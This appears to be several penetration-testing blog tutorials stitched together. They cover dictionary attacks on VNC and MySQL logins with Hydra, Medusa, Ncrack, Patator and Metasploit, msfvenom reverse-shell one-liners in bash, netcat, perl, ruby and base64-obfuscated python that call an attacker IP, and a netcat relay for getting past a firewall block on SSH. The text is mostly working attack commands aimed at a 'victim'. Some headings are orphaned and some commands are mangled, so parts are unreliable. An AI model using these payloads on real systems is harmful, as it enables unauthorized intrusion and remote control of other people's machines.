6 Ways to Hack VNC Login Password

In this article, we will learn how to gain control over our victim’s PC through 5900 Port use for VNC service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

 Let’s starts!!

xHydra 

This is the graphical version to apply dictionary attack via 5900 port to hack a system. For this method to work:

Enter xHydra in your kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select VNC in box against Protocol option and give the port number 5900 against the port option

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

-P:  denotes path for password list

-s: denote destination port number

-t: Run TASKS number of connects in parallel

Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the VNC password as 098765

Metasploit

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6

msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/vnc/vnc_login) > run

Awesome!! From given below image you can observe the same password: 098765 have been found by metasploit

Patator

 Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as VNC, HTTP, SMB and etc.

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, VNC, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

Here

-u: denotes username

-P:  denotes path for password list

As you can observe that we had successfully grabbed the VNC password as 098765.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900

 Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the vnc password as 098765.

Spawn TTY Shell using Msfvenom (One Liner Payload)

Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using single line payload which is also known as stagers exploit that comes in metasploit.

Basically there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired terminal on a serial connection connected to mouse or keyboard and PTs is suedo tty terminal, to get the copy of terminals on network connections via SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open the terminal in your kali Linux and type msfconsole to load metasploit framework, now search all one-liner payloads for UNIX system using search command as given below, it will dump all exploit that can be used to compromise any UNIX system.

search cmd/unix

From given below image you can observed that it has dump all exploit that can be used to compromised any UNIX system. In this tutorial we are going to use some of payloads to spawn a TTY shell.

Compromise Bash shell

In order to compromise a bash shell you can use reverse_bash  payload along msfvenom as given in below command.

msfvenom –p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_bash

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 1111 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 67 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTy shell.

For example when target will open (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121>) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 1111

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

whoami: it tells you are root user of the system you have compromised.

Compromise Netcat shell

In order to compromise a netcat shell you can use reverse_netcat payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_netcat

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 2222 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 104 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

when target will open ( mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0

/tmp/admson 2>&1; rm /tmp/admoszx ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 2222

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell.

Compromise Perl shell

In order to compromise a perl shell you can use reverse_perl payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_perl

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 3333 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 232 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Now again when target will open (perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.103:3333");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};) ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 3333

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell. Here we found target IP address: 192.168.1.1106 by executing ifconfig command in his TTY shell.

Compromise Python shell

In order to compromise a python shell you can use reverse_Python payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_python

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 4444 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open the following malicious code in his terminal, attacker will get reverse shell through netcat.

python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAgICwgICAgICAgIHN1YnByb2Nlc3MgICAgICAgICAsICAgICAgICBvcyAgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguMS4xMDMiICAgICA7ICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICAgICAgLCAgICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICAgICAgICwgICAgICAgIHBvcnQpKSAgICAgOyAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgICwgICAgICAgIDApICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAgLCAgICAgICAgMSkgICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICAsICAgICAgICAyKSAgICAgOyAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

nc -lvp 4444

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Compromise Ruby shell

In order to compromise a ruby shell you can use reverse_ruby payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_ruby

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 5555 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 131 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open (ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end') malicious code in his terminal, attacker will get reverse shell through netcat.

nc -lvp 5555

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Compromise bin/sh shell

In order to compromise a command shell you can use reverse_netcat_gaping payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_netcat_gaping

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 6666 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

In order to access bin/sh shell of target system for compromising TTY shell firslty we had access PTs termianl  of  target through SSH and then past the malicious code (nc 192.168.1.103 6666 -e /bin/sh

) inside PTY terminal.

nc -lvp 6666

From given below image you can observe that we had successfully access TTy shell of target system.

Password Cracking:PostgreSQL

5 Ways to Hack MySQL Login

In this article, we will learn how to gain control over our victim's PC through mysql service via port 3306. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as root and password as toor.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.106:3306

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as root and password as toor.

xHydra

This is the graphical version to apply dictionary attack via 3306 port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select MYSQL in box against Protocol option and give the port number 3306 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 mysql

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as root and password as toor.

Metasploit

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.106

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > set stop_on_success true

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Bypass SSH Restriction by Port Relay

Today we are going to access the ssh port which is blocked by the firewall and is forwarded to another port through Port relay tool. Netcat relay is quite useful tool to connect with any remote system by evading the firewall restriction.

Attacker: Kali Linux (IP: 192.168.1.2)

Victim: Ubuntu Server (IP: 192.168.1.7)

Connect to SSH via port 22

Lets first try to get the normal SSH shell.  As you can see in the given screenshot we successfully get a ssh shell on the port 22 of the Server 192.168.1.7.

Command: ssh pavan@192.168.1.7

Block Port 22 for Incoming TCP Packet

Now let’s block SSH service Port 22 for Incoming TCP Packet using Iptables. Here we are making an inbound rule to block the tcp packets on the port 22 if the packet source is Kali (192.168.1.2)

Command: iptables –A INPUT –s 192.168.1.2 –p tcp –dport 22 –j DROP

After Blocking the port let’s try to get a shell. From given below image you can observe that we got a Connection Time Out Error as the packets are dropped by the firewall.

Allow TCP packets on another port

Now let’s make a rule in the firewall to accept the tcp packets on the port 4444 if the packet source is Kali (192.168.1.2).

Command: iptables –I INPUT 1 –s 192.168.1.2 –p tcp –dport 4444 –j ACCEPT

Check Netcat communication between Attacker and Client

Let’s check if we can get a netcat session on the port 4444 to the Kali (192.168.1.2).

Command: nc –v –l –p 4444

Command: nc 192.168.1.7 4444

As you can see in the given Image that we have received a netcat session on the port 4444 from SSH server on the Kali (192.168.1.2).

Use Netcat Relay backpipe to access SSH service

Now we will have to make a Relay. But first, let’s understand, what the commands depicted below do?

The First command makes a special type of file called a FIFO or named pipe. We call it backpipe because it is going to carry our responses back through the relay.

Now the second command makes a netcat listener that is allowed through the firewall. This Netcat listener will connect its standard input (0<) to the backpipe. We then forward the standard output of this Netcat listener to Netcat client, which connects to our localhost (127.0.0.1) on TCP port 22 where sshd listens. We then use the forward pipe (1>) to send data and receive responses simultaneously. We need a back and forward pipe because Netcat provides a two-way communication.

Command: mknod /tmp/backpipe p

[p]: Tells the mknod to create a FIFO

Command: nc –l –p 4444 0

/tmp/backpipe

[-l]: Listener

[-p]: Port

AccessSSH through Netcat Relay

Now let’s try to connect the ssh connection through the port 4444.

Command: ssh pavan@192.168.1.7 –p 4444

[-p]: To specify Port

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here